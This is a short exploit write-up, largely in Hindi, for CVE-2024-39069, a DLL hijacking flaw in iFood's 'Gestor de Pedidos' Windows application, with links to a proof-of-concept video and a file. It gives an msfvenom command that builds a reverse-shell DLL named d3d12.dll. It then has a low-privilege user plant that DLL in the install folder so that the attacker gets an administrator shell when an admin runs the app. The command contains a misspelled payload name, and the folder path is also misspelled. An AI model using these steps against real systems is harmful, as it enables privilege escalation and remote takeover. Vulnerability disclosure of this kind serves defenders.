
CVE-2024-39069
एक हमलावर 'd3d12.dll' नामक एक दुर्भावनापूर्ण DLL को ऐसी निर्देशिका में रखता है जिसे एप्लिकेशन वैध 'd3d12.dll' मिलने से पहले खोजता है। जब एप्लिकेशन लॉन्च किया जाता है, तो यह वैध DLL के बजाय दुर्भावनापूर्ण DLL को लोड करता है, जिससे हमलावर एप्लिकेशन के संदर्भ में मनमाना कोड निष्पादित कर सकता है।
Vendor Homepage: https://gestordepedidos.ifood.com.br/
Google Drive: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing
POC video: https://youtu.be/oMIobV2M0T8
काली लिनक्स पर msfvenom के साथ दुर्भावनापूर्ण dll फ़ाइल बनाएं
msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
निम्न स्तर के उपयोगकर्ता पहुंच के रूप में काली से विंडोज होस्ट पर बनाई गई 'd3d12.dll' को स्थानांतरित करें
निम्न स्तर के उपयोगकर्ता पहुंच के रूप में बनाई गई 'd3d12.dll' फ़ाइल को 'C:\Gestor de Peddios\d3d12.dll' पर ले जाएं
जब व्यवस्थापक एप्लिकेशन चलाता है, तो आपको व्यवस्थापक के रूप में रिवर्स शेल प्राप्त होगा